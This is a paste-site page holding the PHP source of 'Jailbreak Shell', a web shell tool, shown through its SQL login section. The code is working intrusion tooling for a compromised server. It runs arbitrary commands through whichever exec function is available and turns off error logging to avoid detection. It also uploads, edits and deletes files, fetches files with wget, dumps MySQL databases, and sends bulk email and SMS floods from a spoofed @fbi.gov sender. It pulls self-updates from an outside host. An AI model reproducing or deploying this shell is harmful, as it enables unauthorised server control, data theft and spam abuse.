Jailbreak Shell - Shells-Center.Com


SUBMITTED BY: Guest

DATE: Sept. 6, 2014, 7:36 a.m.

FORMAT: PHP

SIZE: 56.3 kB

HITS: 485

  1. <?php
  2. /*======================================*\
  3. || #################################### ||
  4. || # Jailbreak Shell by x iJB x # ||
  5. || #################################### ||
  6. || # v1.00 # ||
  7. || #################################### ||
  8. \*======================================*/
  9. // hardcoded variables, do not change unless you know what you're doing
  10. $welcometext = 'Jailbreak Shell | Welcome';
  11. $lock = true; // enable the username and password log on access to shell?
  12. $jbshell_auth_user = 'jbshell'; // the login username to this shell
  13. $jbshell_auth_pass = 'jbshell'; // the login password to this shell
  14. $url = (!empty($_SERVER['HTTPS'])) ? "https://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'] : "http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
  15. $rand = mt_rand(100000,999999);
  16. $traceback = false; // will only work if $lock = true!
  17. $traceback_email = 'my-email@gmail.com'; // email to send tracebacks to
  18. $traceback_from = 'jailbreak-shell'.$rand.'@fbi.gov'; // don't change this, it'll help identify jailbreak shell, and should pass spam filters and email blocks too.
  19. $traceback_subject = 'Jailbreak Shell - usage update'; // you can change this if necessary, but it's probably best to leave it as this.
  20. $traceback_body = 'Hello,
  21. This email is to inform you that a user has successfully logged in to Jailbreak Shell.
  22. If you were not expecting this email, please change the lock username and password for the shell.
  23. The visitor\'s IP address is '.$_SERVER['REMOTE_ADDR'].'.
  24. They logged in on '.date("D").' '.date("d").' '.date("F").' at '.date("h").':'.date("i").' '.date("a").'.
  25. URL: '.$url.'.
  26. Thank you,
  27. Jailbreak Shell.'; // don't edit the email body!
  28. $traceback_headers = 'From: '.$traceback_from; // definitely do not change this!
  29. $version = '2.0.0-2'; // current version of the shell. don't change it or you may get a constant "update is available" message.
  30. $update = true; // enable or disable the shell update feature here
  31. $update_url = 'http://www.p0wersurge.com/jb/shell/latest.php?do=source'; // the url of the file that holds the latest update
  32. $check_version_url = 'http://www.p0wersurge.com/jb/shell/latest.php?do=version'; // the url of the file that holds the latest version
  33. $space = getdisk(disk_free_space(realpath(getcwd())));
  34. $total = getdisk(disk_total_space(realpath(getcwd())));
  35. $self = basename($_SERVER['PHP_SELF']);
  36. $secure_reset = true; // if enabled, you will be emailed a key that will allow you to reset the default username and password to jbshell
  37. // Thanks to lionaneesh!
  38. @ini_set("memory_limit","9999M");
  39. @ini_restore("safe_mode_include_dir");
  40. @ini_restore("safe_mode_exec_dir");
  41. @ini_restore("disable_functions");
  42. @ini_restore("allow_url_fopen");
  43. @ini_restore("safe_mode");
  44. @ini_restore("open_basedir");
  45. if(function_exists('ini_set'))
  46. {
  47. @ini_set('error_log',NULL); // No alarming logs
  48. @ini_set('log_errors',0); // No logging of errors
  49. @ini_set('file_uploads',1); // Enable file uploads
  50. @ini_set('allow_url_fopen',1); // allow url fopen
  51. } else {
  52. @ini_alter('error_log',NULL);
  53. @ini_alter('log_errors',0);
  54. @ini_alter('file_uploads',1);
  55. @ini_alter('allow_url_fopen',1);
  56. }
  57. @set_magic_quotes_runtime(0);
  58. @set_time_limit(0);
  59. // start the session
  60. session_start();
  61. // shell functions
  62. function getdisk($size)
  63. {
  64. if(!$size) return 0;
  65. if($size>=1073741824) return(round($size/1073741824)." GB");
  66. elseif($size>=1048576) return(round($size/1048576)." MB");
  67. elseif($size>=1024) return(round($size/1024)." KB");
  68. else return($size." B");
  69. }
  70. function thisdir($dir)
  71. {
  72. $dir = str_replace("\\","/",$dir);
  73. $dir = str_replace("//","/",$dir);
  74. return $dir;
  75. }
  76. function getdisabled()
  77. {
  78. error_reporting(E_ALL);
  79. $disabled_functions = @ini_get('disable_functions');
  80. if ($disabled_functions!='')
  81. {
  82. $arr = explode(',', $disabled_functions);
  83. sort($arr);
  84. for ($i=0; $i<count($arr); $i++)
  85. {
  86. echo $i.' - '.$arr[$i].'< br>';
  87. }
  88. } else {
  89. echo 'None';
  90. }
  91. }
  92. function backup_tables($host,$user,$pass,$name,$sqlname,$tables = '*')
  93. {
  94. $link = mysql_connect($host,$user,$pass);
  95. mysql_select_db($name,$link);
  96. //get all of the tables
  97. if($tables == '*')
  98. {
  99. $tables = array();
  100. $result = mysql_query('SHOW TABLES');
  101. while($row = @mysql_fetch_row($result))
  102. {
  103. $tables[] = $row[0];
  104. }
  105. }
  106. else
  107. {
  108. $tables = is_array($tables) ? $tables : explode(',',$tables);
  109. }
  110. //cycle through
  111. foreach($tables as $table)
  112. {
  113. $result = mysql_query('SELECT * FROM '.$table);
  114. $num_fields = mysql_num_fields($result);
  115. @$return.= 'DROP TABLE '.$table.';';
  116. $row2 = mysql_fetch_row(mysql_query('SHOW CREATE TABLE '.$table));
  117. $return.= "\n\n".$row2[1].";\n\n";
  118. for ($i = 0; $i < $num_fields; $i++)
  119. {
  120. while($row = mysql_fetch_row($result))
  121. {
  122. $return.= 'INSERT INTO '.$table.' VALUES(';
  123. for($j=0; $j<$num_fields; $j++)
  124. {
  125. $row[$j] = addslashes($row[$j]);
  126. $row[$j] = @ereg_replace("\n","\\n",$row[$j]);
  127. if (isset($row[$j])) { $return.= '"'.$row[$j].'"' ; } else { $return.= '""'; }
  128. if ($j<($num_fields-1)) { $return.= ','; }
  129. }
  130. $return.= ");\n";
  131. }
  132. }
  133. $return.="\n\n\n";
  134. }
  135. //save file
  136. $handle = fopen($sqlname,'w+');
  137. @fwrite($handle,$return);
  138. fclose($handle);
  139. //save file
  140. }
  141. function execmd($cmd,$d_functions="None")
  142. {
  143. if($d_functions=="None") {$ret=passthru($cmd); return $ret;}
  144. $funcs=array("shell_exec","exec","passthru","system","popen","proc_open");
  145. $d_functions=str_replace(" ","",$d_functions);
  146. $dis_funcs=explode(",",$d_functions);
  147. foreach($funcs as $safe)
  148. {
  149. if(!in_array($safe,$dis_funcs))
  150. {
  151. if($safe=="exec")
  152. {
  153. $ret=@exec($cmd);
  154. $ret=join("\n",$ret);
  155. return $ret;
  156. }
  157. elseif($safe=="system")
  158. {
  159. $ret=@system($cmd);
  160. return $ret;
  161. }
  162. elseif($safe=="passthru")
  163. {
  164. $ret=@passthru($cmd);
  165. return $ret;
  166. }
  167. elseif($safe=="shell_exec")
  168. {
  169. $ret=@shell_exec($cmd);
  170. return $ret;
  171. }
  172. elseif($safe=="popen")
  173. {
  174. $ret=@popen("$cmd",'r');
  175. if(is_resource($ret))
  176. {
  177. while(@!feof($ret))
  178. $read.=@fgets($ret);
  179. @pclose($ret);
  180. return $read;
  181. }
  182. return -1;
  183. }
  184. elseif($safe="proc_open")
  185. {
  186. $cmdpipe=array(
  187. 0=>array('pipe','r'),
  188. 1=>array('pipe','w')
  189. );
  190. $resource=@proc_open($cmd,$cmdpipe,$pipes);
  191. if(@is_resource($resource))
  192. {
  193. while(@!feof($pipes[1]))
  194. $ret.=@fgets($pipes[1]);
  195. @fclose($pipes[1]);
  196. @proc_close($resource);
  197. return $ret;
  198. }
  199. return -1;
  200. }
  201. }
  202. }
  203. return -1;
  204. }
  205. if(!isset($_REQUEST['do']) OR trim($_REQUEST['do']) == null)
  206. {
  207. $_REQUEST['do'] = 'main';
  208. }
  209. function mainscreen()
  210. {
  211. switch($_REQUEST['do'])
  212. {
  213. case 'main':
  214. global $self;
  215. global $version;
  216. global $update_url;
  217. global $check_version_url;
  218. global $lock;
  219. global $traceback;
  220. global $jbshell_auth_user;
  221. global $jbshell_auth_pass;
  222. if($lock == true)
  223. {
  224. if($jbshell_auth_user == 'jbshell')
  225. {
  226. $user_changed = "<span style='color:red;font-weight:bold;'>Unchanged</span>";
  227. } else {
  228. $user_changed = "<span style='color:lime;font-weight:bold;'>Changed</span>";
  229. }
  230. if($jbshell_auth_pass == 'jbshell')
  231. {
  232. $pass_changed = "<span style='color:red;font-weight:bold;'>Unchanged</span>";
  233. } else {
  234. $pass_changed = "<span style='color:lime;font-weight:bold;'>Changed</span>";
  235. }
  236. $lockstatus = "<span style='color:lime;font-weight:bold;'>Active</span>";
  237. } else {
  238. $user_changed = "<span style='color:red;font-weight:bold;'>Lock Inactive</span>";
  239. $pass_changed = "<span style='color:red;font-weight:bold;'>Lock Inactive</span>";
  240. $lockstatus = "<span style='color:red;font-weight:bold;'>Inactive</span>";
  241. }
  242. if($traceback == true)
  243. {
  244. $tracebackstatus = "<span style='color:lime;font-weight:bold;'>Active</span>";
  245. } else {
  246. $tracebackstatus = "<span style='color:red;font-weight:bold;'>Inactive</span>";
  247. }
  248. echo "<center>";
  249. echo "<h1>Welcome to Jailbreak Shell</h1>";
  250. echo "<h2>Navigation is as simple as using the links above.</h2>";
  251. echo "<h3>Developed by @xijailbreakx</h3>";
  252. echo "<h3>Got a suggestion? Post it on our community forum <a href='http://www.p0wersurge.com/forums/home/' target='_blank'>here</a>.</h3>";
  253. echo "<h2>Shell Status and Statistics</h2>";
  254. echo "<table width='50%'>";
  255. echo "<tr>";
  256. echo "<td width='50%'>Shell Version</td>";
  257. echo "<td width='50%'>$version</td>";
  258. echo "</tr>";
  259. echo "<tr>";
  260. echo "<td width='50%'>Latest Version</td>";
  261. echo "<td width='50%'>".@file_get_contents($check_version_url)."</td>";
  262. echo "</tr>";
  263. echo "<tr>";
  264. echo "<td width='50%'>Update URL</td>";
  265. echo "<td width='50%'>$update_url</td>";
  266. echo "</tr>";
  267. echo "<tr>";
  268. echo "<td width='50%'>Version URL</td>";
  269. echo "<td width='50%'>$check_version_url</td>";
  270. echo "</tr>";
  271. echo "<tr>";
  272. echo "<td width='50%'>Shell Lock</td>";
  273. echo "<td width='50%'>$lockstatus</td>";
  274. echo "</tr>";
  275. echo "<tr>";
  276. echo "<td width='50%'>Shell Traceback</td>";
  277. echo "<td width='50%'>$tracebackstatus</td>";
  278. echo "</tr>";
  279. echo "<tr>";
  280. echo "<td width='50%'>Default Username Changed?</td>";
  281. echo "<td width='50%'>$user_changed</td>";
  282. echo "</tr>";
  283. echo "<tr>";
  284. echo "<td width='50%'>Default Password Changed?</td>";
  285. echo "<td width='50%'>$pass_changed</td>";
  286. echo "</tr>";
  287. echo "</table>";
  288. echo "<br />";
  289. break;
  290. case 'info':
  291. echo "<center>";
  292. echo "<table width='95%' style='border:0;'>";
  293. echo "<th>Credits</th>";
  294. echo "</table>";
  295. echo "<table width='95%' style='border:0;'>";
  296. echo "<tr>";
  297. echo "<td width='50%' style='border:0;'>Jailbreak Shell</td>";
  298. echo "<td width='50%' style='border:0;'>x iJB x / x iJailBreak x</td>";
  299. echo "</tr>";
  300. echo "<tr>";
  301. echo "<td width='50%' style='border:0;'>Directory Functions & MySQL</td>";
  302. echo "<td width='50%' style='border:0;'>Mulciber Shell</td>";
  303. echo "</tr>";
  304. echo "<tr>";
  305. echo "<td width='50%' style='border:0;'>Lock</td>";
  306. echo "<td width='50%' style='border:0;'>lionaneesh / Ani-Shell</td>";
  307. echo "</tr>";
  308. echo "</table>";
  309. echo "<table width='95%' style='border:0;'>";
  310. echo "<th>Greetz</th>";
  311. echo "</table>";
  312. echo "<table width='95%' style='border:0;'>";
  313. echo "<tr>";
  314. echo "<td width='50%' style='border:0;'>Plum</td>";
  315. echo "<td width='50%' style='border:0;'>ProxieZ</td>";
  316. echo "</tr>";
  317. echo "<tr>";
  318. echo "<td width='50%' style='border:0;'>AK47</td>";
  319. echo "<td width='50%' style='border:0;'>H3NDO</td>";
  320. echo "</tr>";
  321. echo "<tr>";
  322. echo "<td width='50%' style='border:0;'>BoxHead</td>";
  323. echo "<td width='50%' style='border:0;'>w0rd</td>";
  324. echo "</tr>";
  325. echo "<tr>";
  326. echo "<td width='50%' style='border:0;'>Dark Avenger</td>";
  327. echo "<td width='50%' style='border:0;'>.t0asty</td>";
  328. echo "</tr>";
  329. echo "<tr>";
  330. echo "<td width='50%' style='border:0;'>Dante</td>";
  331. echo "<td width='50%' style='border:0;'>Nero</td>";
  332. echo "</tr>";
  333. echo "<tr>";
  334. echo "<td width='50%' style='border:0;'>0B4M4</td>";
  335. echo "<td width='50%' style='border:0;'>KrypTiK</td>";
  336. echo "</tr>";
  337. echo "<tr>";
  338. echo "<td width='50%' style='border:0;'>Konvict</td>";
  339. echo "<td width='50%' style='border:0;'>Relevant</td>";
  340. echo "</tr>";
  341. echo "<tr>";
  342. echo "<td width='50%' style='border:0;'>Jack!</td>";
  343. echo "<td width='50%' style='border:0;'>Andy</td>";
  344. echo "</tr>";
  345. echo "<tr>";
  346. echo "<td width='50%' style='border:0;'>Aunstic</td>";
  347. echo "<td width='50%' style='border:0;'>Shad0w</td>";
  348. echo "</tr>";
  349. echo "</table>";
  350. break;
  351. case 'files':
  352. global $self;
  353. echo "<center>";
  354. if(isset($_REQUEST['del']))
  355. {
  356. if(!@unlink($_REQUEST['del']))
  357. {
  358. echo "Failed to delete ".$_REQUEST['del']."!";
  359. } else {
  360. echo "Deleted ".$_REQUEST['del']." successfully!";
  361. }
  362. }
  363. if(isset($_REQUEST['rename']))
  364. {
  365. echo "<form action='$self' method='post'>";
  366. echo "<input type='hidden' name='do' value='files' />";
  367. echo "<input type='hidden' name='dorename' value='true' />";
  368. echo "<table width='30%'>";
  369. echo "<tr>";
  370. echo "<td width='50%'>Current Filename</td>";
  371. echo "<td width='50%'>New Filename</td>";
  372. echo "</tr>";
  373. echo "<tr>";
  374. echo "<td width='50%'><input type='text' name='currentname' value='".$_REQUEST['rename']."' /></td>";
  375. echo "<td width='50%'><input type='text' name='newname' value='".$_REQUEST['rename']."' /></td>";
  376. echo "</tr>";
  377. echo "</table>";
  378. echo "<input type='submit' value='Rename' />";
  379. echo "</form>";
  380. }
  381. if(isset($_REQUEST['dorename']))
  382. {
  383. rename($_REQUEST['currentname'],$_REQUEST['newname']);
  384. }
  385. if(isset($_REQUEST['dl'])) // thanks to mulciber for this, ob_get_clean() saved my ass!
  386. {
  387. if(@!file_exists($_REQUEST['dl']))
  388. {
  389. echo "Permission denied!";
  390. break;
  391. break;
  392. }
  393. @$open_f = fopen($_REQUEST['dl'],'r');
  394. @$buffer = fread($open_f,filesize($_REQUEST['dl']));
  395. @ob_start();
  396. header("Content-type: application/octet-stream;");
  397. header("Content-length: ".strlen($buffer));
  398. header("Content-disposition: attachment; filename=".basename($_REQUEST['dl']).";");
  399. @ob_get_clean();
  400. @ob_end_flush();
  401. }
  402. echo "<table width='95%'>";
  403. echo "<tr>";
  404. echo "<td width='100%'>Current Directory: ".getcwd()."</td>";
  405. echo "</tr>";
  406. echo "</table>";
  407. echo "<table width='95%'>";
  408. echo "<th width='20%'>File / Dir Name</th>";
  409. echo "<th width='20%'>File / Dir Size</th>";
  410. echo "<th width='20%'>File Owner</th>";
  411. echo "<th width='20%'>Writeable</th>";
  412. echo "<th width='20%'>File Ops</th>";
  413. foreach(glob("*") as $file)
  414. {
  415. if(is_dir($file))
  416. {
  417. if(is_writeable($file))
  418. {
  419. $writeable = "Yes!";
  420. } else {
  421. $writeable = "No!";
  422. }
  423. echo "<tr width='100%'>";
  424. echo "<td width='20%'>".$file."</td>";
  425. echo "<td width='20%'>DIR</td>";
  426. echo "<td width='20%'>".fileowner($file)."</td>";
  427. echo "<td width='20%'>".$writeable."</td>";
  428. echo "<td width='20%'><a href='$self?do=files&rename=$file'>Rename</a> | <a href='$self?do=files&del=$file'>Delete</a></td>";
  429. echo "</tr>";
  430. }
  431. }
  432. foreach(glob("*") as $file)
  433. {
  434. if(!is_dir($file))
  435. {
  436. if(is_writeable($file))
  437. {
  438. $writeable = "Yes!";
  439. } else {
  440. $writeable = "No!";
  441. }
  442. echo "<tr width='100%'>";
  443. echo "<td width='20%'><a href='$self?do=fileedit&filename=$file'>".$file."</a></td>";
  444. echo "<td width='20%'>".round((filesize($file) / 1024))." KB</td>";
  445. echo "<td width='20%'>".fileowner($file)."</td>";
  446. echo "<td width='20%'>".$writeable."</td>";
  447. echo "<td width='20%'><a href='$self?do=files&rename=$file'>Rename</a> | <a href='$self?do=files&del=$file'>Delete</a> | <a href='$self?do=files&dl=$file'>Download</a></td>";
  448. echo "</tr>";
  449. }
  450. }
  451. echo "</table>";
  452. break;
  453. case 'fileedit':
  454. global $self;
  455. echo "<center>";
  456. if(isset($_REQUEST['filename']))
  457. {
  458. echo "<form action='$self' method='post'>";
  459. echo "<input type='hidden' name='do' value='filesave' />";
  460. echo "<input type='hidden' name='filename' value='".$_REQUEST['filename']."' />";
  461. echo "<textarea rows='20' cols='100' name='filecontent'>";
  462. echo htmlentities(file_get_contents($_REQUEST['filename']));
  463. echo "</textarea>";
  464. echo "<br />";
  465. echo "<input type='submit' value='Save' />";
  466. echo "</form>";
  467. } else {
  468. echo "No file selected for editing!";
  469. }
  470. break;
  471. case 'filesave':
  472. global $self;
  473. echo "<center>";
  474. if((isset($_REQUEST['filecontent'])) && (isset($_REQUEST['filename'])))
  475. {
  476. if(file_put_contents(html_entity_decode($_REQUEST['filename']),$_REQUEST['filecontent']))
  477. {
  478. echo "File saved successfully!";
  479. } else {
  480. echo "Error while saving file!";
  481. }
  482. } else {
  483. echo "No file loaded!";
  484. }
  485. break;
  486. case 'cmd':
  487. echo '<textarea rows="20" cols="100">';
  488. if($_REQUEST['do'] == 'cmd')
  489. {
  490. @execmd($_REQUEST['cmd']);
  491. }
  492. echo '</textarea>';
  493. break;
  494. case 'uploadfile':
  495. if ($_FILES["file"]["error"] > 0)
  496. {
  497. echo "Return Code: " . $_FILES["file"]["error"] . "<br />";
  498. } else {
  499. if (file_exists($_FILES["file"]["name"]))
  500. {
  501. unlink($_FILES["file"]["name"]);
  502. }
  503. move_uploaded_file($_FILES["file"]["tmp_name"],$_FILES["file"]["name"]);
  504. echo "Uploaded file to: " . $_FILES["file"]["name"];
  505. }
  506. break;
  507. case 'createfile':
  508. if(file_exists($_POST['createfilename']))
  509. {
  510. echo "File '".$_POST['createfilename']."' already exists!";
  511. } else {
  512. /*global $self;
  513. echo "<form action='".$self."' type='post'>";
  514. echo "<input type=\"hidden\" name=\"do\" value=\"makefile\" />";
  515. echo "<textarea rows=\"20\" cols=\"100\" name=\"createfilecontent\">";
  516. echo "</textarea>";
  517. echo "<br />";
  518. echo "<input type='hidden' name='filename' value='".$_POST['createfilename']."' />";
  519. echo "<input type=\"submit\" name=\"submit\" value=\"Save\" />";
  520. echo "</form>";*/
  521. if(fopen($_POST['createfilename'],'w'))
  522. {
  523. echo "File created!";
  524. } else {
  525. echo "Failed to create file!";
  526. }
  527. }
  528. break;
  529. case 'createdirectory':
  530. if(file_exists($_POST['createdirname']))
  531. {
  532. die("A directory with that name already exists!");
  533. } else {
  534. if(!mkdir($_POST['createdirname']))
  535. {
  536. echo "Failed to create directory!";
  537. } else {
  538. echo "Created directory successfully!";
  539. }
  540. }
  541. break;
  542. case 'wgetfile':
  543. if(!execmd("wget ".$_POST['wgetlink']))
  544. {
  545. echo "Could not download file!";
  546. } else {
  547. echo "File was downloaded successfully!";
  548. }
  549. break;
  550. case 'makefile':
  551. $handle = fopen($_POST['filename'],'w');
  552. if(!$handle)
  553. {
  554. die("Could not create file!");
  555. } else {
  556. if(!fwrite($handle,$_POST['createfilecontent']))
  557. {
  558. die("Could not write content to file!");
  559. } else {
  560. fclose($handle);
  561. }
  562. }
  563. break;
  564. case 'secinfo':
  565. // few variables to find security information and provide results for security rating
  566. $open_basedir = (@ini_get("open_basedir")=='')?"Off":"On";
  567. $magic_quotes = get_magic_quotes_gpc()?"On":"Off";
  568. $passwd_readable = @is_readable("/etc/passwd")?"Yes":"No";
  569. $mysql_on = function_exists("mysql_connect")?"On":"Off";
  570. $register_globals_on = (@ini_get('register_globals')=='')?"Off":"On";
  571. $remote_inclusions = (@ini_get('allow_url_include')=='')?"Off":"On";
  572. $curl_on = function_exists("curl_init")?"On":"Off";
  573. $php_version = phpversion();
  574. $php_safe_mode = (@ini_get("safe_mode")=='')?"Off":"On";
  575. // start score calculations
  576. if($open_basedir == "Off")
  577. {
  578. $open_basedir_score = 1;
  579. } else {
  580. $open_basedir_score = 0;
  581. }
  582. if($magic_quotes == "Off")
  583. {
  584. $magic_quotes_score = 1;
  585. } else {
  586. $magic_quotes_score = 0;
  587. }
  588. if($passwd_readable == "No")
  589. {
  590. $passwd_readable_score = 1;
  591. } else {
  592. $passwd_readable_score = 0;
  593. }
  594. if($mysql_on == "Off")
  595. {
  596. $mysql_on_score = 1;
  597. } else {
  598. $mysql_on_score = 0;
  599. }
  600. if($register_globals_on == "Off")
  601. {
  602. $register_globals_on_score = 1;
  603. } else {
  604. $register_globals_on_score = 0;
  605. }
  606. if($remote_inclusions == "Off")
  607. {
  608. $remote_inclusions_score = 1;
  609. } else {
  610. $remote_inclusions_score = 0;
  611. }
  612. if($curl_on == "Off")
  613. {
  614. $curl_on_score = 1;
  615. } else {
  616. $curl_on_score = 0;
  617. }
  618. if($php_version > "4.9.9")
  619. {
  620. $php_version_score = 1;
  621. } else {
  622. $php_version_score = 0;
  623. }
  624. if($php_safe_mode == "On")
  625. {
  626. $php_safe_mode_score = 1;
  627. } else {
  628. $php_safe_mode_score = 0;
  629. }
  630. // start security rating calculations
  631. $security_rating = $open_basedir_score + $magic_quotes_score + $passwd_readable_score + $mysql_on_score + $register_globals_on_score + $remote_inclusions_score + $curl_on_score + $php_version_score + $php_safe_mode_score;
  632. echo "<center>";
  633. echo "<table width='80%'>";
  634. echo "<tr>";
  635. echo "<td width='100%'>Security Info</td>";
  636. echo "</tr>";
  637. echo "</table>";
  638. echo "<table width='80%'>";
  639. echo "<tr>";
  640. echo "<th width='50%'><u>PHP Version</u></td>";
  641. echo "<th width='50%'><u>PHP Safe Mode</u></td>";
  642. echo "</tr>";
  643. echo "<tr>";
  644. echo "<td width='50%'>$php_version</td>";
  645. echo "<td width='50%'>$php_safe_mode</td>";
  646. echo "</tr>";
  647. echo "<tr>";
  648. echo "<th width='50%'><u>Open Basedir</u></td>";
  649. echo "<th width='50%'><u>Magic Quotes</u></td>";
  650. echo "</tr>";
  651. echo "<tr>";
  652. echo "<td width='50%'>$open_basedir</td>";
  653. echo "<td width='50%'>$magic_quotes</td>";
  654. echo "</tr>";
  655. echo "<tr>";
  656. echo "<th width='50%'><u>Register Globals</u></td>";
  657. echo "<th width='50%'><u>Remote Inclusions</u></td>";
  658. echo "</tr>";
  659. echo "<tr>";
  660. echo "<td width='50%'>$register_globals_on</td>";
  661. echo "<td width='50%'>$remote_inclusions</td>";
  662. echo "</tr>";
  663. echo "<tr>";
  664. echo "<th width='50%'><u>MySQL</u></td>";
  665. echo "<th width='50%'><u>cURL</u></td>";
  666. echo "</tr>";
  667. echo "<tr>";
  668. echo "<td width='50%'>$mysql_on</td>";
  669. echo "<td width='50%'>$curl_on</td>";
  670. echo "</tr>";
  671. echo "<tr>";
  672. echo "<th width='50%'><u>Read /etc/passwd?</u></td>";
  673. echo "<th width='50%'><u>Rating</u></td>";
  674. echo "</tr>";
  675. echo "<tr>";
  676. echo "<td width='50%'>$passwd_readable</td>";
  677. echo "<td width='50%'>$security_rating / 9</td>";
  678. echo "</tr>";
  679. echo "</table>";
  680. break;
  681. case 'reverseip':
  682. echo "Reverse IP";
  683. echo "<br />";
  684. echo "<form action='http://www.my-ip-neighbors.com/' method='post'>";
  685. echo "Domain or IP address:";
  686. echo "<input type='text' size='50' name='domain' value='".$_SERVER['SERVER_ADDR']."' />";
  687. echo "<input type='submit' name='submit' value='Search' />";
  688. echo "</form>";
  689. break;
  690. case 'mailer':
  691. global $self;
  692. echo "<center>";
  693. echo "<table width='80%'>";
  694. echo "<tr>";
  695. echo "<td width='100%'>Email System</td>";
  696. echo "</tr>";
  697. echo "</table>";
  698. echo "<form action='$self' method='post'>";
  699. echo "<input type='hidden' name='do' value='sendmail' />";
  700. echo "<table width='80%'>";
  701. echo "<tr>";
  702. echo "<td width='20%'>Send Email To:</td>";
  703. echo "<td width='80%'><input type='text' name='mailto' size='65' /></td>";
  704. echo "</tr>";
  705. echo "<tr>";
  706. echo "<td width='20%'>Send Email From:</td>";
  707. echo "<td width='80%'><input type='text' name='mailfrom' size='65' /></td>";
  708. echo "</tr>";
  709. echo "<tr>";
  710. echo "<td width='20%'>Email Subject:</td>";
  711. echo "<td width='80%'><input type='text' name='mailsubject' size='65' /></td>";
  712. echo "</tr>";
  713. echo "<tr>";
  714. echo "<td width='20%'>How Many:</td>";
  715. echo "<td width='80%'><input type='text' name='mailamount' size='65' /></td>";
  716. echo "</tr>";
  717. echo "<tr>";
  718. echo "<td width='20%'>Email Body:</td>";
  719. echo "<td width='80%'><textarea rows='10' cols='50' name='mailbody'></textarea></td>";
  720. echo "</tr>";
  721. echo "</table>";
  722. echo "<input type='submit' name='submit' value='Send' />";
  723. echo "</form>";
  724. break;
  725. case 'sms':
  726. global $self;
  727. echo "<center>";
  728. echo "<table width='80%'>";
  729. echo "<tr>";
  730. echo "<td width='100%'>SMS System</td>";
  731. echo "</tr>";
  732. echo "</table>";
  733. echo "<form action='$self' method='post'>";
  734. echo "<input type='hidden' name='do' value='sendsms' />";
  735. echo "<table width='80%'>";
  736. echo "<tr>";
  737. echo "<td width='20%'>Send SMS To (use a full phone number including area code):</td>";
  738. echo "<td width='80%'><input type='text' name='mailto' size='65' /></td>";
  739. echo "</tr>";
  740. echo "<tr>";
  741. echo "<td width='20%'>Send SMS From (email address):</td>";
  742. echo "<td width='80%'><input type='text' name='mailfrom' size='65' /></td>";
  743. echo "</tr>";
  744. echo "<tr>";
  745. echo "<td width='20%'>SMS Subject:</td>";
  746. echo "<td width='80%'><input type='text' name='mailsubject' size='65' /></td>";
  747. echo "</tr>";
  748. echo "<tr>";
  749. echo "<td width='20%'>How Many:</td>";
  750. echo "<td width='80%'><input type='text' name='mailamount' size='65' /></td>";
  751. echo "</tr>";
  752. echo "<tr>";
  753. echo "<td width='20%'>SMS Body:</td>";
  754. echo "<td width='80%'><textarea rows='10' cols='50' name='mailbody'></textarea></td>";
  755. echo "</tr>";
  756. echo "</table>";
  757. echo "<input type='submit' name='submit' value='Send' />";
  758. echo "</form>";
  759. break;
  760. case 'sendmail':
  761. $mailto = $_REQUEST['mailto'];
  762. $mailfrom = $_REQUEST['mailfrom'];
  763. $mailsubject = $_REQUEST['mailsubject'];
  764. $mailamount = $_REQUEST['mailamount'];
  765. $mailbody = $_REQUEST['mailbody'];
  766. $headers = "From: $mailfrom\r\n";
  767. $headers .= 'MIME-Version: 1.0' . "\n";
  768. $headers .= 'Content-type: text/html; charset=iso-8859-1' . "\r\n";
  769. $sentmail = 0;
  770. $succeeded = 0;
  771. $failed = 0;
  772. while($sentmail < $mailamount)
  773. {
  774. if(!@mail($mailto, $mailsubject, $mailbody, $headers))
  775. {
  776. $sentmail++;
  777. echo "Failed to send mail $sentmail...<br />";
  778. $failed++;
  779. } else {
  780. $sentmail++;
  781. echo "Sent message $sentmail...<br />";
  782. $succeeded++;
  783. }
  784. }
  785. echo "<br />";
  786. echo "Sent mail $succeeded times!<br />";
  787. echo "Failed to send mail $failed times!";
  788. break;
  789. case 'sendsms':
  790. $mailto = $_REQUEST['mailto'];
  791. $mailfrom = $_REQUEST['mailfrom'];
  792. $mailsubject = $_REQUEST['mailsubject'];
  793. $mailamount = $_REQUEST['mailamount'];
  794. $mailbody = $_REQUEST['mailbody'];
  795. $headers = "From: $mailfrom\r\n";
  796. $headers .= 'MIME-Version: 1.0' . "\n";
  797. $headers .= 'Content-type: text/html; charset=iso-8859-1' . "\r\n";
  798. $sentmail = 0;
  799. $succeeded = 0;
  800. $failed = 0;
  801. while($sentmail < $mailamount)
  802. {
  803. if(!@mail($mailto, $mailsubject, $mailbody, $headers))
  804. {
  805. $sentmail++;
  806. echo "Failed to send mail $sentmail...<br />";
  807. $failed++;
  808. } else {
  809. $sentmail++;
  810. echo "Sent message $sentmail...<br />";
  811. $succeeded++;
  812. }
  813. }
  814. echo "<br />";
  815. echo "Sent mail $succeeded times!<br />";
  816. echo "Failed to send mail $failed times!";
  817. break;
  818. case 'sql':
  819. global $self;
  820. echo "<center>";
  821. if(!isset($_SESSION['mysqlcon']) && !isset($_POST['login']))
  822. {
  823. echo "<form action='$self' method='post'>";
  824. echo "<input type='hidden' name='do' value='sql' />";
  825. echo "<table width='80%'>";
  826. echo "<tr>";
  827. echo "<td width='100%'>SQL Connection</td>";
  828. echo "</tr>";
  829. echo "</table>";
  830. echo "<table width='80%'>";
  831. echo "<tr>";
  832. echo "<td width='50%'>MySQL Host</td>";
  833. echo "<td width='50%'><input type='text' name='sql_host' size='50' value='localhost' /></td>";
  834. echo "</tr>";
  835. echo "<tr>";
  836. echo "<td width='50%'>MySQL Username</td>";
  837. echo "<td width='50%'><input type='text' name='sql_user' size='50' /></td>";
  838. echo "</tr>";
  839. echo "<tr>";
  840. echo "<td width='50%'>MySQL Password</td>";
  841. echo "<td width='50%'><input type='text' name='sql_pass' size='50' /></td>";
  842. echo "</tr>";
  843. echo "<tr>";
  844. echo "<td width='50%'>MySQL Port</td>";
  845. echo "<td width='50%'><input type='text' name='sql_port' size='50' value='3306' /></td>";
  846. echo "</tr>";
  847. echo "</table>";
  848. echo "<input type='submit' name='login' value='Login' />";
  849. echo "</form>";
  850. } elseif(!isset($_SESSION['mysqlcon']) && isset($_POST['login'])) {
  851. extract($_POST);
  852. $sql_connection = @mysql_connect($sql_host.":".$sql_port,$sql_user,$sql_pass);
  853. if($sql_connection)
  854. {
  855. $_SESSION['sql_host'] = $sql_host;
  856. $_SESSION['sql_port'] = $sql_port;
  857. $_SESSION['sql_user'] = $sql_user;
  858. $_SESSION['sql_pass'] = $sql_pass;
  859. $_SESSION['mysqlcon'] = true;
  860. header("Location: $self?do=sqledit");
  861. } else {
  862. echo "Failed to log in!";
  863. }
